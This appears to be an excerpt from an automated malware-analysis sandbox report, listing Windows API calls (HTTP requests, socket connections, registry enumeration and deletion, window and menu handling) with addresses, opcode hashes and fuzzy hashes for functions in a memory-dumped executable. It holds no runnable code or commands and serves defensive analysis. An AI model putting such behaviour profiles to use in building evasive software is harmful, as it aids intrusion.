                                                    • Opcode ID: 32b98405ce8d3a1c2fc87da1b1fc0f73627925bc8c34d37874cfc31244cf62f4
                                                    • Instruction ID: dc3608461005af5fab71c25aa07448635399053d8771977762efaa007ba1fa1a
                                                    • Opcode Fuzzy Hash: 32b98405ce8d3a1c2fc87da1b1fc0f73627925bc8c34d37874cfc31244cf62f4
                                                    • Instruction Fuzzy Hash: 4751F5A07047E53DFB324634AC05BB77FA85B56304F48448BF1C5959E2C2ADE8C4D768
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00447093
                                                    • SendMessageW.USER32(?,00001036,?,?), ref: 004470A7
                                                    • SetWindowPos.USER32(?,?,?,?,?,?,00000013,?,?,?,?,003FCEBD,?,?,?,?), ref: 004470C1
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00447133
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00447161
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysListView32
                                                    • API String ID: 2326795674-78025650
                                                    • Opcode ID: fd50c7829cf02e8d9650a5639bb2a7a349cc174c2b48b552c2b8409e0f31d473
                                                    • Instruction ID: b492e2c37e0be72966df176ebaa19890419c7d66a91f81fde3dfad2d70fc75d4
                                                    • Opcode Fuzzy Hash: fd50c7829cf02e8d9650a5639bb2a7a349cc174c2b48b552c2b8409e0f31d473
                                                    • Instruction Fuzzy Hash: D241D571A04308AFEB219F64CC85FEF77A8EF08354F10052BF544E6291C7769D858B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00431D44
                                                    • HttpOpenRequestW.WININET(00000000,?,?,?,?,?,?), ref: 00431D70
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00000003), ref: 00431DB2
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00431DC7
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00431DD4
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,00000003,00000000), ref: 00431E04
                                                    • InternetCloseHandle.WININET(00000000), ref: 00431E4B
                                                      • Part of subcall function 00432777: GetLastError.KERNEL32(?,?,00431B0B,00000000,00000000,00000001), ref: 0043278C
                                                      • Part of subcall function 00432777: SetEvent.KERNEL32(?,?,00431B0B,00000000,00000000,00000001), ref: 004327A1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                    • String ID:
                                                    • API String ID: 2603140658-0
                                                    • Opcode ID: 62c62db8eaa6932d6f5f5e4c796cced17ca90008b96b5b3ee8cc7537a4829313
                                                    • Instruction ID: a345d17bd385cf8370cee934b340136d550ce726bf33db1d10bababaf2c29d09
                                                    • Opcode Fuzzy Hash: 62c62db8eaa6932d6f5f5e4c796cced17ca90008b96b5b3ee8cc7537a4829313
                                                    • Instruction Fuzzy Hash: 6B4180B5500208BEEB129F50CC89FFB3B6CFF09754F00512BFA059A150D7799E458BA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CoCreateInstance.OLE32(00000018,00452C2C,00000005,00000028,?,?,00000001,?,?,00000000,00000000,00000000,?,00438639,?,00000000), ref: 0041DAC5
                                                    • SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,00438639,?,00000000,00000000), ref: 0041DAFB
                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0041DB0C
                                                    • SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,00438639,?,00000000,00000000), ref: 0041DB8E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                    • String ID: ,,E$DllGetClassObject
                                                    • API String ID: 753597075-2224467221
                                                    • Opcode ID: a40bd937c221ef3720cf6b9d5a83b7323504fafb0a175a640a60be797441ac43
                                                    • Instruction ID: a091a159d7ba4ed06512e3704a3883e3911a94892330c574ad843ed744d82b9d
                                                    • Opcode Fuzzy Hash: a40bd937c221ef3720cf6b9d5a83b7323504fafb0a175a640a60be797441ac43
                                                    • Instruction Fuzzy Hash: 0F41C1F2904208EFDB14CF54CC85ADB7BA9EF45354F1181ABF9059E106D7B9EA80CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateMenu.USER32 ref: 004473F4
                                                    • SetMenu.USER32(?,00000000), ref: 00447403
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00447490
                                                    • IsMenu.USER32 ref: 004474A6
                                                    • CreatePopupMenu.USER32 ref: 004474B0
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004474DD
                                                    • DrawMenuBar.USER32 ref: 004474E5
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                    • String ID:
                                                    • API String ID: 161812096-0
                                                    • Opcode ID: 2e2117f7811886ad27d96b892c9a8cccc51c3382380d034b39ce61bcb6c187dd
                                                    • Instruction ID: 177e3fe6f71d3a8b536e8f6575c259c302711ccce950dff018645de0689c083c
                                                    • Opcode Fuzzy Hash: 2e2117f7811886ad27d96b892c9a8cccc51c3382380d034b39ce61bcb6c187dd
                                                    • Instruction Fuzzy Hash: 38419C79A01204EFEB10DF64D844EAABBF5FF09350F14042AF945A7350C735A914CF58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,?,?,000000FF,?,?,?,?,?,?), ref: 0044125C
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441286
                                                    • FreeLibrary.KERNEL32(00000000), ref: 0044133D
                                                      • Part of subcall function 0044122D: RegCloseKey.ADVAPI32(?), ref: 004412A3
                                                      • Part of subcall function 0044122D: FreeLibrary.KERNEL32(?), ref: 004412F5
                                                      • Part of subcall function 0044122D: RegEnumKeyExW.ADVAPI32(?,?,?,000000FF,?,?,?,?), ref: 00441318
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 004412E0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 395352322-0
                                                    • Opcode ID: b54c5111866a77886088dd581791c2f6ce3ff9c25984777772ed8e42e97809e2
                                                    • Instruction ID: 82250273116289216a8f2e1aa33bdd4fffbcdea268fae70cf4f0beb909677be8
                                                    • Opcode Fuzzy Hash: b54c5111866a77886088dd581791c2f6ce3ff9c25984777772ed8e42e97809e2
                                                    • Instruction Fuzzy Hash: 5E314DB5901119BFEB14DFD0DD89EFFB77CEB09304F00016AE501E2550D6795E899AA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,?,00000000), ref: 0041E01F
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0041E045
                                                    • SysAllocString.OLEAUT32(00000000), ref: 0041E048
                                                    • SysAllocString.OLEAUT32(?), ref: 0041E066
                                                    • SysFreeString.OLEAUT32(?), ref: 0041E06F
                                                    • StringFromGUID2.OLE32(?,?,00000028,00000000,?,00000000), ref: 0041E094
                                                    • SysAllocString.OLEAUT32(?), ref: 0041E0A2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: e2edd244b0058afa859663ec7e92170d962b94d17e00ce1e316a25be14e9e427
                                                    • Instruction ID: 381df3ba13b2094b962b7f8b6fe77641459e572cb0cda0bb489a897679509e9d
                                                    • Opcode Fuzzy Hash: e2edd244b0058afa859663ec7e92170d962b94d17e00ce1e316a25be14e9e427
                                                    • Instruction Fuzzy Hash: 4E21B77A50412DBEEB10DBA9DC48CFB3BACEB053747104126F959DB190C6759C858774
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044655B
                                                    • GetWindowLongW.USER32(00F784A8,000000F0), ref: 0044658E
                                                    • GetWindowLongW.USER32(00F784A8,000000F0), ref: 004465C3
                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 004465F5
                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0044661F
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00446630
                                                    • SetWindowLongW.USER32 ref: 0044664A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID:
                                                    • API String ID: 2178440468-0
                                                    • Opcode ID: ee51dd6738b21220ce64e91f476e98213085fbd2a6c2a2a7489fe51697676f80
                                                    • Instruction ID: 0e4ca0423d05e5e2e7a961631c76f9f759acfe0ecbfd6924a85ec9946ac421fe
                                                    • Opcode Fuzzy Hash: ee51dd6738b21220ce64e91f476e98213085fbd2a6c2a2a7489fe51697676f80
                                                    • Instruction Fuzzy Hash: 86311335605110AFEB20DF18EC84F5A3BE1FB4A354F1601BAF5058B2B9CB36A844DB5A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,00000008), ref: 0041E0FA
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0041E120
                                                    • SysAllocString.OLEAUT32(00000000), ref: 0041E123
                                                    • SysAllocString.OLEAUT32(?), ref: 0041E144
                                                    • SysFreeString.OLEAUT32(?), ref: 0041E14D
                                                    • StringFromGUID2.OLE32(?,?,00000028,?,00000008), ref: 0041E167
                                                    • SysAllocString.OLEAUT32(?), ref: 0041E175
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: b360f8353534ce4a587e749d5a061165c02b458d0b50633a91c166d6ae3b74ae
                                                    • Instruction ID: d68e61f1469251881f9f2efa35c369220c41d03927a9feb27a829daa8185ed3d
                                                    • Opcode Fuzzy Hash: b360f8353534ce4a587e749d5a061165c02b458d0b50633a91c166d6ae3b74ae
                                                    • Instruction Fuzzy Hash: AC21777A504118BFEB109FA9DC89CFB7BACEB067707508126F955CB1A0DA359C81CB78
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 004380A0: inet_addr.WSOCK32(?,?,?,?,?,?,00000000), ref: 004380CB
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004364D9
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004364E8
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00436521
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 0043652A
                                                    • WSAGetLastError.WSOCK32 ref: 00436534
                                                    • closesocket.WSOCK32(00000000), ref: 0043655D
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00436576
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 910771015-0
                                                    • Opcode ID: b479a4e126e271ca6c96964a730235dca240299a07cf073aaf4c5193d2aa0924
                                                    • Instruction ID: 186cff091270de94a1514ad628cf6de780df5dfe0c57f1ef70f0a941778e72bf
                                                    • Opcode Fuzzy Hash: b479a4e126e271ca6c96964a730235dca240299a07cf073aaf4c5193d2aa0924
                                                    • Instruction Fuzzy Hash: DE318335600119BFDB10AF14DC85BBA7BA9EB49754F02802AF9099B291DB78AD048B65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003C1D35: CreateWindowExW.USER32 ref: 003C1D73
                                                      • Part of subcall function 003C1D35: GetStockObject.GDI32(00000011), ref: 003C1D87
                                                      • Part of subcall function 003C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 003C1D91
                                                    • SendMessageW.USER32(00000000,00002001,?,FF000000), ref: 004478A1
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004478AE
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004478B9
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004478C8
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004478D4
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: 2d0d69d3eb96166d3e9ff354a7caf3cc87243a24ba8649b9f907aa740931b935
                                                    • Instruction ID: 3b50bb24069ed25304cade0cbf4f629dba55926195989edb346bf6653b869ab2
                                                    • Opcode Fuzzy Hash: 2d0d69d3eb96166d3e9ff354a7caf3cc87243a24ba8649b9f907aa740931b935
                                                    • Instruction Fuzzy Hash: 151160B2550119BEFF159F60CC85EEB7F6DEF097A8F014115F608A6090C7769C22DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0042454E
                                                    • LoadStringW.USER32(00000000), ref: 00424555
                                                    • GetModuleHandleW.KERNEL32(00000100,00001389,?,00000100), ref: 0042456B
                                                    • LoadStringW.USER32(00000000), ref: 00424572
                                                    • MessageBoxW.USER32(00000100,?,?,00011010), ref: 004245B6
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00424593
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 4072794657-3128320259
                                                    • Opcode ID: 4765ee8c94a4174c3473d4cd9700d7cc7422b3efafd9ec371b42ba542bd64200
                                                    • Instruction ID: 31f26d1e4c09dada72b4e5388cba7767bc920d240895f89a7ad9162f008b2042
                                                    • Opcode Fuzzy Hash: 4765ee8c94a4174c3473d4cd9700d7cc7422b3efafd9ec371b42ba542bd64200
                                                    • Instruction Fuzzy Hash: 7E014FF7500218BFE71197A0DD89EFB372CD705341F0005B6BB49E2051DA355E898B79
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,003E4292,?), ref: 003E41E3
                                                    • GetProcAddress.KERNEL32(00000000), ref: 003E41EA
                                                    • EncodePointer.KERNEL32(00000000), ref: 003E41F6
                                                    • DecodePointer.KERNEL32(00000001,003E4292,?), ref: 003E4213
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoInitialize$combase.dll
                                                    • API String ID: 3489934621-340411864
                                                    • Opcode ID: e333b6d20860410e24cb255b637996892c148a5b654977bd49e1977981fc18f7
                                                    • Instruction ID: ad39b31c6658768f90246a6d5d59daa1eae3fa829012b8d81c9a5adf23c749e0
                                                    • Opcode Fuzzy Hash: e333b6d20860410e24cb255b637996892c148a5b654977bd49e1977981fc18f7
                                                    • Instruction Fuzzy Hash: 57E01AB8590341AFEB205FB1EC0DB083AA4B7A6743F504939B911E50E0DBF504998F0C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003E41B8), ref: 003E42B8
                                                    • GetProcAddress.KERNEL32(00000000), ref: 003E42BF
                                                    • EncodePointer.KERNEL32(00000000), ref: 003E42CA
                                                    • DecodePointer.KERNEL32(003E41B8), ref: 003E42E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 3489934621-2819208100
                                                    • Opcode ID: 43613412883e4d833b8ef4d0a15e88ea8468fd9cfe31042dbe5b016d5c792f50
                                                    • Instruction ID: 40e08054b7ba4bb122d844d470b972b43dcb890f4fd3247222eeff34cd20ed70
                                                    • Opcode Fuzzy Hash: 43613412883e4d833b8ef4d0a15e88ea8468fd9cfe31042dbe5b016d5c792f50
                                                    • Instruction Fuzzy Hash: 00E0B67C981312EBEB119F61ED0DB493AA4B76AB46F20493AF501E10A0DFB54688CB1C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00436F14
                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00436F35
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00436F48
                                                    • htons.WSOCK32(?,?,00000000,?,00000000), ref: 00436FFE
                                                    • inet_ntoa.WSOCK32(?), ref: 00436FBB
                                                      • Part of subcall function 0041AE14: _strlen.LIBCMT ref: 0041AE1E
                                                    • _strlen.LIBCMT ref: 00437058
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: _strlen$ErrorLasthtonsinet_ntoa
                                                    • String ID:
                                                    • API String ID: 1050922162-0
                                                    • Opcode ID: 1966d5d074b76505495378d8ffe9a5f1ca1d1d77202e8d3d345c72bd865a55cc
                                                    • Instruction ID: 8eff7e8aab9221046e8c3b142ce5564980b50da3030003d41f8488d221b458f6
                                                    • Opcode Fuzzy Hash: 1966d5d074b76505495378d8ffe9a5f1ca1d1d77202e8d3d345c72bd865a55cc
                                                    • Instruction Fuzzy Hash: 9A810071108300ABD724EF24CC86F6BB7E9AF88714F11891EF5459B292DB74ED05CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003F1B11: SetFilePointerEx.KERNEL32(00000000,00000002,?,?,00000004,00000000,?,?,?,?,003EDC91,?,00000000,00000000,00000002,?), ref: 003F1B48
                                                      • Part of subcall function 003F1B11: GetLastError.KERNEL32(?,003EDC91,?,00000000,00000000,00000002,?,?,?), ref: 003F1B52
                                                    • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,?,00000001,00000109,?,?,003F8499,?,?,00000080), ref: 003F9A5B
                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000001,00000109,?,?,003F8499,?,?,00000080), ref: 003F9A62
                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000109,?,?,003F8499), ref: 003F9B04
                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000001,00000109,?,?,003F8499,?), ref: 003F9B0B
                                                    • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000109,?,?,003F8499), ref: 003F9B41
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00000109,?,?,003F8499,?), ref: 003F9B71
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                                    • String ID:
                                                    • API String ID: 1354853467-0
                                                    • Opcode ID: 87a4f44a7572feee8bada442ed038b08daf217530e46ac154dcf9d347eb3b135
                                                    • Instruction ID: bb9885156c7c54fc32f9a64f41434e8132a91fd9f0be10b12b86295227d17a02
                                                    • Opcode Fuzzy Hash: 87a4f44a7572feee8bada442ed038b08daf217530e46ac154dcf9d347eb3b135
                                                    • Instruction Fuzzy Hash: C741F23290051CAEDF236BB8AC4ABBE3A78EF46370F210357F629E61D0E7354D418661
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 004410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00440038,?,?), ref: 004410BC
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00440548
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00440588
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 004405AB
                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004405D4
                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 00440617
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00440624
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                    • String ID:
                                                    • API String ID: 3451389628-0
                                                    • Opcode ID: 97b7df6589294e7c172330131648d201b1ffe8ef63e96cdfaed573535aab599c
                                                    • Instruction ID: 02d9fc9d9c95f401790419e4317bb8969d2d45adc7ebbe47e0401079e472d851
                                                    • Opcode Fuzzy Hash: 97b7df6589294e7c172330131648d201b1ffe8ef63e96cdfaed573535aab599c
